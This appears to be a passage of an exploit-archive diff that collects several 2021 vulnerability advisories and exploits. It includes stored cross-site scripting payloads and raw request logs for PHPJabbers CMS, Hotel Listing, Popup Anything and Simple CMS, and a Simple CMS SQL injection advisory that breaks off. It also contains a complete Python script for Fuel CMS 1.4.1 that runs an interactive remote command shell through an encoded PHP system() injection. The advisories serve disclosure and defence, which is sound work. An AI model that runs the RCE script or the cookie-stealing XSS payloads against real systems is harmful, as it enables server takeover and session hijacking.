The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) post method request.
Privileged authenticated accounts with ui access are able to inject own malicious script code as name for users.
The script code execution is performed after the inject via post method in the user list (pjAdminUsers).
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Create (Add)
[+] Update
Vulnerable Parameter(s):
[+] pjActionCreate
[+] pjActionUpdate
Affected Module(s):
[+] pjAdminUsers
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payloads
"><img src=evil.source onload=alert(document.cookie)>
"><img src=evil.source onload=alert(document.domain)>
--- PoC Session Logs (POST) [Add & Update]
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
--
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_update=1&id=2&role_id=2&email=test@test.de&password=test&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
Keep-Alive: timeout=10, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
-
GET: HTTP/1.1 200 OK
Server: Apache/2.2.15 (CentOS)
Content-Length: 380
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vulnerable Source: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03)
<select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option>
<option value="F">Inactive</option></select></td><td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=1"
class="pj-table-icon-edit"></a></td></tr><tr class="pj-table-row-even" data-id="id_3"><td><input type="checkbox" name="record[]" value="3"
class="pj-table-select-row"></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label">r"><img src="evil.source" onload="alert(document.cookie)"></img></span>
<input type="text" data-name="name" style="display: none;" class="pj-form-field pj-form-text
pj-selector-editable" value="r"><img src=evil.source onload=alert(document.cookie)>"></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label">test@ftp.world</span><input type="text" data-name="email" style="display: none;"
class="pj-form-field pj-form-text pj-selector-editable" value="test@ftp.world"></td><td><span class="pj-table-cell-label">06-09-2021</span></td>
<td><span class="pj-table-cell-label"><span class="label-status user-role-editor">editor</span></span></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label pj-status pj-status-T">Active</span><select data-name="status" style="display: none;"
class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option><option value="F">Inactive</option></select></td>
<td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=3" class="pj-table-icon-edit"></a>
<a href="index.php?controller=pjAdminUsers&action=pjActionDeleteUser&id=3" class="pj-table-icon-delete"></a></td></tr></tbody></table>
Reference(s):
https://phpjabbers-cms.localhost:8080/
https://phpjabbers-cms.localhost:8080/1630949262_438/
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

276
exploits/php/webapps/50476.txt Normal file
View file

@ -0,0 +1,276 @@
# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-28
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://hotel.eplug-ins.com/
# Software Link: https://hotel.eplug-ins.com/hoteldoc/
# Version: v3
# Tested on: Linux
Document Title:
===============
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2277
Release Date:
=============
2021-10-28
Vulnerability Laboratory ID (VL-ID):
====================================
2277
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Hotel, Motel , Bar & Restaurant Listing Plugin + Membership plugin using Wordpress with PHP and MySQL Technologie.
(Copy of the Homepage:https://hotel.eplug-ins.com/hoteldoc/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official Hotel Listing v3.x wordpress plugin web-application.
Affected Product(s):
====================
e-plugins
Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-19: Researcher Notification & Coordination (Security Researcher)
2021-08-20: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official Hotel Listing v3.x wordpress plugin web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The vulnerabilities are located in add new listing - address, city, zipcode, country and location input fields of the my-account module.
Remote attackers can register a low privileged application user account to inject own malicious script codes with persistent attack vector to
hijack user/admin session credentials or to permanently manipulate affected modules. The execute of the malicious injected script code takes
place in the frontend on preview but as well in the backend on interaction to edit or list (?&profile=all-post) by administrative accounts.
The request method to inject is post and the attack vector is persistent located on the application-side.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Add New Listing
Vulnerable Input(s):
[+] address
[+] city
[+] zipcode
[+] country
Affected Module(s):
[+] Frontend on Preview (All Listings)
[+] Backend on Preview (All Listings) or Edit
Proof of Concept (PoC):
=======================
The persistent web vulnerabilities can be exploited by remote attackers with privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E
Vulnerable Source: new-listing
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4 ">Address</label>
<input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter address Here">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Area</label>
<input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Area Here">
</div>
</div>
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4">City</label>
<input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter city ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Zipcode</label>
<input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>""
placeholder="Enter Zipcode ">
</div>
</div>
<div class=" form-group row">
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">State</label>
<input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter State ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Country</label>
<input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Country ">
</div>
--- PoC Session Logs (POST) ---
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
Host: hotel-eplug-ins.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1603
Origin:http://hotel-eplug-ins.localhost:8000
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id=
&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=&
award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=&
room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=&
Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=&
day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992
-
POST: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin:http://hotel-eplug-ins.localhost:8000
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Encoding: gzip
-
http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post
Host: hotel-eplug-ins.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
GET: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post
Solution - Fix & Patch:
=======================
1. Encode and parse all vulnerable input fields on transmit via post method request
2. Restrict the input fields to disallow usage of special chars
3. Encode and escape the output content in the edit and list itself to prevent the execution point
Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerability in the hotel listing application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

63
exploits/php/webapps/50477.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#!/usr/bin/python3
import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style
def get_arguments():
parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
args = parser.parse_args()
if len(sys.argv) <=2:
parser.print_usage()
sys.exit()
return args
args = get_arguments()
url = args.url
if "http" not in url:
sys.stderr.write("Enter vaild url")
sys.exit()
try:
r = requests.get(url)
if r.status_code == 200:
print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
except requests.ConnectionError:
print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
sys.exit()
while True:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)
#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
print(output[0])
if cmd == "exit":
break

44
exploits/php/webapps/50479.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03/11/2021
# Exploit Author: Luca Schembri
# Vendor Homepage: https://www.essentialplugin.com/
# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
# Version: < 2.0.4
** Summary **
A user with a low privileged user can perform XSS-Stored attacks.
** Plugin description **
Popup Anything is the best popup builder and marketing plugin that
helps you get more email subscribers, increase sales and grow your
business.
Manage powerful modal popup for your WordPress blog or website. You
can add an unlimited popup with your configurations.
** Vulnerable page **
http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit
** PoC **
Go on the "Popup Anything - Settings" tab and select "Simple Link" as
"Link Type". Select "Link Test" and use this payload:
test" onclick="alert(1)
Save the popup and reload the page. Now click on "Link Text" and it
will execute the javascript code
The same attack can be exploited with "Button Text" and "Popup width" fields.
** Remediation **
Upgrade to 2.0.4 version or later

246
exploits/php/webapps/50482.txt Normal file
View file

@ -0,0 +1,246 @@
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2302
Release Date:
=============
2021-10-19
Vulnerability Laboratory ID (VL-ID):
====================================
2302
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Full Authentication (Admin/Root Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent cross site web vulnerability is located in `name`, `username`, `password` parameters of the `newUser`
or `editUser` modules. Remote attackers with privileged application user account and panel access are able to inject
own malicious script code as credentials. The injected code executes on preview of the users list. The request method
to inject is post and the attack vector is persistent.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] newUser
[+] editUser
Vulnerable File(s):
[+] admin.php?act=users
Vulnerable Input(s):
[+] Name
[+] Username
[+] Password
Vulnerable Parameter(s):
[+] name
[+] username
[+] password
Affected Module(s):
[+] Users (act=users) (Backend)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with privileged account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
"><img src='31337'onerror=alert(0)></img>
Vulnerable Source: admin.php?act=users
<tbody><tr>
<td class="headlist"><a href="admin.php?act=users&orderType=DESC&orderBy=name">Name</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=email">Email</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=username">Username</a></td>
<td class="headlist" width="23%">Password</td>
<td class="headlist" colspan="2">&nbsp;</td>
</tr>
<tr>
<td class="bodylist">c"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">keymaster23@protonmail.com</td>
<td class="bodylist">d"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">e"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit"><img class="act" src="images/edit.png" alt="Edit"></a></td>
<td class="bodylistAct"><a class="delete" href="admin.php?act=delUser&id=7" onclick="return confirm('Are you sure you want to delete it?');"
title="DELETE"><img class="act" src="images/delete.png" alt="DELETE"></a></td>
</tr>
--- PoC Session Logs (POST) [Create] ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=c"><img src='31337'onerror=alert(0)></img>&email=tester23@test.de
&username=d"><img src='31337'onerror=alert(0)></img>
&password=e"><img src='31337'onerror=alert(0)></img>&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 5258
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/31337
Host: simple-cms.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 196
content-type: text/html; charset=iso-8859-1
Reference(s):
https://simple-cms.localhost:8000/simplecms/admin.php
https://simple-cms.localhost:8000/simplecms/admin.php
https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

225
exploits/php/webapps/50483.txt Normal file
View file

@ -0,0 +1,225 @@
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - SQL Injection
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2303
Release Date:
=============
2021-10-19
Vulnerability Laboratory ID (VL-ID):
====================================
2303
Common Vulnerability Scoring System:
====================================
7.1
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the official creative zone web-application.
The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms
or file system of the application.
The sql-injection web vulnerability is located in the `newUser` and `editUser` function of the `users` module in
the `admin.php` file. Remote attackers with privileged access to the panel are able to add users. If a user account
already exists like for example the admin account, each add of the same name or email values results in a unfiltered
mysql exception. The exception is not filtered and sanitized. Thus allows privileged attackers to inject and execute
own sql commands on the affected database management system to compromise. The request method to inject is post and
the attack vector is non-persistent.
Exploitation of the sql injection vulnerability requires user interaction and a privileged web-application user account.
